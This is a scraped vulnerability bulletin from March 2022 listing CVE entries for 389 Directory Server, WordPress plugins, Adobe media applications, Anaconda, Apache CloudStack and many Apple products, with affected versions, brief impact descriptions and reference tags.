389_directory_server — 389_directory_server
  A vulnerability was discovered in the 389 Directory Server that allows an unauthenticated attacker with network access to the LDAP port to cause a denial of service. The denial of service is triggered by a single message sent over a TCP connection, no bind or other authentication is required. The message triggers a segmentation fault that results in slapd crashing. 2022-03-16 not yet calculated CVE-2022-0918
MISC
MISC accelerated_mobile_pages — accelerated_mobile_pages Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.31). 2022-03-18 not yet calculated CVE-2021-23150
CONFIRM
CONFIRM accelerated_mobile_pages — accelerated_mobile_pages Multiple Authenticated (admin user role) Persistent Cross-Site Scripting (XSS) vulnerabilities discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.32). 2022-03-18 not yet calculated CVE-2021-23209
CONFIRM
CONFIRM accesslog — accesslog
  All versions of package accesslog are vulnerable to Arbitrary Code Injection due to the usage of the Function constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package’s exported constructor function, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on. 2022-03-17 not yet calculated CVE-2022-25760
MISC
MISC admidio — admidio
  Insufficient Session Expiration in GitHub repository admidio/admidio prior to 4.1.9. 2022-03-19 not yet calculated CVE-2022-0991
MISC
CONFIRM adobe — acrobat_reader_dc Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file. 2022-03-18 not yet calculated CVE-2022-24092
MISC adobe — acrobat_reader_dc
  Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file. 2022-03-18 not yet calculated CVE-2022-24091
MISC adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40740
MISC adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40737
MISC adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a WAV file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40738
MISC adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40739
MISC adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40735
MISC adobe — audition Adobe Audition version 14.4 (and earlier) is affected by an Access of Memory Location After End of Buffer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40741
MISC adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40742
MISC adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40736
MISC adobe — audition
  Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a SVG file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40734
MISC adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious WAV file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42729
MISC adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious PSD file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42730
MISC adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42720
MISC adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42722
MISC adobe — bridge Adobe Bridge 11.1.1 (and earlier) is affected by a stack overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file in Bridge. 2022-03-16 not yet calculated CVE-2021-42728
MISC adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42724
MISC adobe — bridge
  Adobe Bridge version 11.1.1 (and earlier) is affected by a double free vulnerability when parsing a crafted DCM file, which could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2022-03-16 not yet calculated CVE-2021-42533
MISC adobe — bridge
  Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted .jpe file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42719
MISC adobe — bridge
  Adobe Bridge version 11.1.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40750
MISC adobe — character_animator Adobe Character Animator version 4.4 (and earlier versions) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40769
MISC adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40768
MISC adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by an Access of Memory Location After End of Buffer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40767
MISC adobe — character_animator Adobe Character Animator version 4.4 (and earlier versions) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40766
MISC adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40765
MISC adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40764
MISC adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a WAF file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40763
MISC adobe — character_animator
  Adobe Character Animator version 4.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40762
MISC adobe — media_encoder Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40782
MISC adobe — media_encoder Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40781
MISC adobe — media_encoder Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40780
MISC adobe — media_encoder Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40779
MISC adobe — media_encoder Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40778
MISC adobe — media_encoder
  Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40777
MISC adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40787
MISC adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40786
MISC adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40788
MISC adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40789
MISC adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42527
MISC adobe — premiere_elements
  Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40785
MISC adobe — premiere_elements
  Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42526
MISC adobe — premiere_pro Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40793
MISC adobe — premiere_pro Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40796
MISC adobe — premiere_pro Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42264
MISC adobe — premiere_pro Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40792
MISC adobe — premiere_pro
  Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40794
MISC adobe — premiere_pro
  Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42263
MISC advanced_product_labels_for_woocommerce — advanced_product_labels_for_woocommerce
  The Advanced Product Labels for WooCommerce WordPress plugin before 1.2.3.7 does not sanitise and escape the tax_color_set_type parameter before outputting it back in the berocket_apl_color_listener AJAX action’s response, leading to a Reflected Cross-Site Scripting 2022-03-14 not yet calculated CVE-2022-0399
CONFIRM
MISC anaconda — anaconda3
  Anaconda Anaconda3 through 2021.11.0.0 and Miniconda3 through 11.0.0.0 can create a world-writable directory under %PROGRAMDATA% and place that directory into the system PATH environment variable. Thus, for example, local users can gain privileges by placing a Trojan horse file into that directory. (This problem can only happen in a non-default installation. The person who installs the product must specify that it is being installed for all users. Also, the person who installs the product must specify that the system PATH should be changed.) 2022-03-17 not yet calculated CVE-2022-26526
MISC
MISC
MISC apache — cloudstack
  Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite. This feature is not enabled by default, the attacker is required to know or guess the project ID for the invite in addition to the invitation token, and the attacker would need to be an existing authorized user of CloudStack. 2022-03-15 not yet calculated CVE-2022-26779
MISC
MISC
MLIST apple — ios_and_ipados
  A resource exhaustion issue was addressed with improved input validation. This issue is fixed in iOS 15.2.1 and iPadOS 15.2.1. Processing a maliciously crafted HomeKit accessory name may cause a denial of service. 2022-03-18 not yet calculated CVE-2022-22588
MISC apple — macos_monterey
  A privacy issue existed in the handling of Contact cards. This was addressed with improved state management. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to access information about a user’s contacts. 2022-03-18 not yet calculated CVE-2022-22644
MISC apple — macos_monterey
  A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22591
MISC apple — macos_monterey
  Multiple issues were addressed by updating to curl version 7.79.1. This issue is fixed in macOS Monterey 12.3. Multiple issues in curl. 2022-03-18 not yet calculated CVE-2022-22623
MISC apple — macos_monterey
  An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22586
MISC apple — macos_monterey
  This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A person with access to a Mac may be able to bypass Login Window. 2022-03-18 not yet calculated CVE-2022-22647
MISC
MISC
MISC apple — macos_monterey
  An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.3. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory. 2022-03-18 not yet calculated CVE-2022-22651
MISC apple — macos_monterey
  This issue was addressed with a new entitlement. This issue is fixed in macOS Monterey 12.3. An app may be able to spoof system notifications and UI. 2022-03-18 not yet calculated CVE-2022-22660
MISC apple — macos_monterey
  A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges. 2022-03-18 not yet calculated CVE-2022-22665
MISC apple — macos_monterey
  A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22669
MISC apple — multiple_products The issue was addressed with additional permissions checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to read other applications’ settings. 2022-03-18 not yet calculated CVE-2022-22609
MISC
MISC
MISC
MISC apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. An attacker in a privileged network position may be able to leak sensitive user information. 2022-03-18 not yet calculated CVE-2022-22659
MISC apple — multiple_products A type confusion issue was addressed with improved state handling. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22661
MISC
MISC
MISC apple — multiple_products An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Logic Pro 10.7.3, GarageBand 10.4.6, macOS Monterey 12.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22664
MISC
MISC
MISC apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. Processing a maliciously crafted image may lead to heap corruption. 2022-03-18 not yet calculated CVE-2022-22666
MISC
MISC
MISC apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22667
MISC apple — multiple_products An access issue was addressed with improved access restrictions. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. A malicious application may be able to identify what other applications a user has installed. 2022-03-18 not yet calculated CVE-2022-22670
MISC
MISC
MISC apple — multiple_products An authentication issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to access photos from the lock screen. 2022-03-18 not yet calculated CVE-2022-22671
MISC apple — multiple_products This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. A user may send audio and video in a FaceTime call without knowing that they have done so. 2022-03-18 not yet calculated CVE-2022-22643
MISC
MISC apple — multiple_products The issue was addressed with improved permissions logic. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to bypass certain Privacy preferences. 2022-03-18 not yet calculated CVE-2022-22600
MISC
MISC
MISC
MISC apple — multiple_products A user interface issue was addressed. This issue is fixed in watchOS 8.5, Safari 15.4. Visiting a malicious website may lead to address bar spoofing. 2022-03-18 not yet calculated CVE-2022-22654
MISC
MISC apple — multiple_products Description: A permissions issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen. 2022-03-18 not yet calculated CVE-2022-22599
MISC
MISC
MISC
MISC apple — multiple_products An issue with app access to camera metadata was addressed with improved logic. This issue is fixed in iOS 15.4 and iPadOS 15.4. An app may be able to learn information about the current camera view before being granted camera access. 2022-03-18 not yet calculated CVE-2022-22598
MISC apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted file may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22597
MISC
MISC
MISC apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22596
MISC
MISC apple — multiple_products A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track sensitive user information. 2022-03-18 not yet calculated CVE-2022-22594
MISC
MISC
MISC
MISC
MISC apple — multiple_products A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22593
MISC
MISC
MISC
MISC
MISC
MISC apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. 2022-03-18 not yet calculated CVE-2022-22592
MISC
MISC
MISC
MISC
MISC apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22590
MISC
MISC
MISC
MISC
MISC apple — multiple_products A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.. 2022-03-18 not yet calculated CVE-2022-22587
MISC
MISC
MISC apple — multiple_products An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, macOS Monterey 12.2, macOS Big Sur 11.6.3. An application may be able to access a user’s files. 2022-03-18 not yet calculated CVE-2022-22585
MISC
MISC
MISC
MISC
MISC apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. Processing a maliciously crafted file may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22584
MISC
MISC
MISC
MISC apple — multiple_products A permissions issue was addressed with improved validation. This issue is fixed in Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. An application may be able to access restricted files. 2022-03-18 not yet calculated CVE-2022-22583
MISC
MISC
MISC apple — multiple_products An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, tvOS 15.3, Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. Processing a maliciously crafted STL file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22579
MISC
MISC
MISC
MISC
MISC apple — multiple_products A memory initialization issue was addressed with improved memory handling. This issue is fixed in Logic Pro 10.7.3, GarageBand 10.4.6, macOS Monterey 12.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22657
MISC
MISC
MISC apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22614
MISC
MISC
MISC
MISC
MISC
MISC apple — multiple_products A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.4 and iPadOS 15.4. A malicious website may be able to access information about the user and their devices. 2022-03-18 not yet calculated CVE-2022-22653
MISC apple — multiple_products An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. 2022-03-18 not yet calculated CVE-2022-22627
MISC
MISC
MISC apple — multiple_products A buffer overflow was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22634
MISC
MISC apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22635
MISC
MISC apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22636
MISC
MISC apple — multiple_products This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions. 2022-03-18 not yet calculated CVE-2022-22622
MISC apple — multiple_products This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to read restricted memory. 2022-03-18 not yet calculated CVE-2022-22648
MISC
MISC
MISC apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22631
MISC
MISC
MISC apple — multiple_products A null pointer dereference was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An attacker in a privileged position may be able to perform a denial of service attack. 2022-03-18 not yet calculated CVE-2022-22638
MISC
MISC
MISC
MISC
MISC
MISC apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22639
MISC
MISC apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22640
MISC
MISC
MISC
MISC apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22641
MISC
MISC
MISC apple — multiple_products This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt. 2022-03-18 not yet calculated CVE-2022-22642
MISC apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, watchOS 8.5, macOS Monterey 12.3. A malicious application may be able to elevate privileges. 2022-03-18 not yet calculated CVE-2022-22632
MISC
MISC
MISC
MISC
MISC apple — multiple_products A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22633
MISC
MISC
MISC
MISC apple — multiple_products This issue was addressed with improved checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions. 2022-03-18 not yet calculated CVE-2022-22621
MISC
MISC
MISC
MISC apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. 2022-03-18 not yet calculated CVE-2022-22620
MISC
MISC
MISC apple — multiple_products This issue was addressed with improved checks. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt. 2022-03-18 not yet calculated CVE-2022-22618
MISC
